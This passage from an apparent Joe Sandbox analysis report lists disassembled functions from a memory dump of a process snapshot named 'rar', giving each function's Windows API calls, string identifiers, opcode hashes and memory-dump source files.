                                                                                                                                                                                                                                      • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3398352648-0
                                                                                                                                                                                                                                      • Opcode ID: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
                                                                                                                                                                                                                                      • Instruction ID: 0aff9e60fcc5168db1fa131f7b91a016f692616625f331cc9773f7c2e9d58aa9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B113036618B4186E7608F21F44456A77E4FBC9F84F5555BAEA8EC3628DF3CD005CB40
                                                                                                                                                                                                                                      Function 00007FF69A3E42E0 Relevance: 6.3, APIs: 4, Instructions: 344COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionThrow$ErrorLaststd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3116915952-0
                                                                                                                                                                                                                                      • Opcode ID: 0d49e5e1870b6e2cd32107f7c0a4bbc3c1d275d8719a69b3e60c906fddd00a3c
                                                                                                                                                                                                                                      • Instruction ID: 18e4d00d22030d99005778de156b8cb945f6b1dafbb1b1d67413f865e467c64b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d49e5e1870b6e2cd32107f7c0a4bbc3c1d275d8719a69b3e60c906fddd00a3c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6EE16E22A18A8682EA30EB25E4505FD73E1FB89B84F5540F6DE4DC7796DE39E905C700
                                                                                                                                                                                                                                      Function 00007FF69A403A70 Relevance: 6.1, APIs: 4, Instructions: 74fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,?,?,00007FF69A4011B0,?,?,?,00000000,?,?,00007FF69A3FF30F,00000000,00007FF69A3E6380,?,00007FF69A3E2EC8), ref: 00007FF69A403AC4
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,?,?,00007FF69A4011B0,?,?,?,00000000,?,?,00007FF69A3FF30F,00000000,00007FF69A3E6380,?,00007FF69A3E2EC8), ref: 00007FF69A403B0A
                                                                                                                                                                                                                                      • DeviceIoControl.KERNEL32 ref: 00007FF69A403B55
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,00007FF69A4011B0,?,?,?,00000000,?,?,00007FF69A3FF30F,00000000,00007FF69A3E6380,?,00007FF69A3E2EC8), ref: 00007FF69A403B60
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFile$CloseControlDeviceHandle
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 998109204-0
                                                                                                                                                                                                                                      • Opcode ID: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
                                                                                                                                                                                                                                      • Instruction ID: 4566933cc88c5b4649eb0bdf2032a1763a3afd74f1ec0689b6add1ef3c27b7dc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F31A136618B8086E7708F11B44469AB7E4FB89BF4F010275EAA993BD8CF3CD4558B00
                                                                                                                                                                                                                                      Function 00007FF69A3E8884 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 324COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: CMT
                                                                                                                                                                                                                                      • API String ID: 0-2756464174
                                                                                                                                                                                                                                      • Opcode ID: 692117ba37696853c3eb7719182859ca18d07d81e1248deabc0defdb2174d0ba
                                                                                                                                                                                                                                      • Instruction ID: 6c6b1aacc031529cf0edede90031124f01b8fb712732304453f3ab9daa8f9c1e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 692117ba37696853c3eb7719182859ca18d07d81e1248deabc0defdb2174d0ba
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DDD1BF62A1869282EA30EB25E4501BD73E1FF95B80F6446F5DA9EC76D5DE3CE941C300
                                                                                                                                                                                                                                      Function 00007FF69A4486D4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF69A448704
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A444E3C: GetCurrentProcess.KERNEL32(00007FF69A449CC5), ref: 00007FF69A444E69
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                                                                                                                                                      • String ID: *?$.
                                                                                                                                                                                                                                      • API String ID: 2518042432-3972193922
                                                                                                                                                                                                                                      • Opcode ID: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
                                                                                                                                                                                                                                      • Instruction ID: aaac96cce1adfb60730f1d3fdca3935ff2ab87dc3f9d446063419a09c46a0441
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E251BE62F15B9685EB20DFA298104AD77E4FB58FD8B4445B2DE1D97B89EF3CE0428301
                                                                                                                                                                                                                                      Function 00007FF69A42B340 Relevance: 4.5, APIs: 3, Instructions: 45memoryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3429775523-0
                                                                                                                                                                                                                                      • Opcode ID: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
                                                                                                                                                                                                                                      • Instruction ID: 63127c6714b977a0797b16ff183bba0a9115af4158c31ef2f11bfb9035c432c7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15111972B14A418EEB208FB5E4912AE77B0FB48B48F40157ADA8E93B58DF3CD145CB00
                                                                                                                                                                                                                                      Function 00007FF69A3FCAFC Relevance: 3.0, APIs: 2, Instructions: 27windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3479602957-0
                                                                                                                                                                                                                                      • Opcode ID: 5edc9aacada912d44111c0c5b3025bcfc37222d54029d4996b892e874874bebb
                                                                                                                                                                                                                                      • Instruction ID: 0554ac33247dc6f447664dce2013fc49c0aa21e34ddcf5654b90599d41568b48
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5edc9aacada912d44111c0c5b3025bcfc37222d54029d4996b892e874874bebb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4F05E21B1878183F3208F26B44052AB7E4FB89BD4F1881B8EA89D3B58DF7CC9518B00
                                                                                                                                                                                                                                      Function 00007FF69A403144 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DiskFreeSpace
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1705453755-0
                                                                                                                                                                                                                                      • Opcode ID: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
                                                                                                                                                                                                                                      • Instruction ID: d4e3970708b1905539ebb13cb3ae336a642a74d197aa4002f08a0636b51f0b9a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B014C62A2868187EB70DB15E4413EA73E0FB99B44F8005B1E6CDC6688DF3CE644CF40
                                                                                                                                                                                                                                      Function 00007FF69A446130 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                      • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                                                                                                                                                      • API String ID: 3215553584-2617248754
                                                                                                                                                                                                                                      • Opcode ID: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
                                                                                                                                                                                                                                      • Instruction ID: a0c33f8de72f85a3c36793d9995220905df2b6345ffa8fd44ff83a7b9d9ca575
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF419C72A09B4599E720CF65E8417AE37E4FB08B98F0055BAEE9C87B55DE3CD025C344
                                                                                                                                                                                                                                      Function 00007FF69A3F7988 Relevance: 13.6, APIs: 9, Instructions: 60COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Console$Mode$Handle$Readfflush
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1039280553-0
                                                                                                                                                                                                                                      • Opcode ID: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
                                                                                                                                                                                                                                      • Instruction ID: 375b06f97b16a0c6c1a41ca6d72871eac3a9aafa020f9a702c8ab83d81cff305
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B218029A186439BFA209F25E80457D73A1FBCAFA1F1412F5EE4A83764DE3CE546C700
                                                                                                                                                                                                                                      Function 00007FF69A430140 Relevance: 12.2, APIs: 8, Instructions: 205COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 932687459-0
                                                                                                                                                                                                                                      • Opcode ID: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
                                                                                                                                                                                                                                      • Instruction ID: eb13fdb3a25fb6ab9dc2032b3c07c8ea47c15d4538f0366164b927fe5135819b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 74819522A09A8286EB71DA11E6443BD73D0EB94F94F1445F1DB8D87B99DF7CE9468300
                                                                                                                                                                                                                                      Function 00007FF69A3EC468 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 420COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
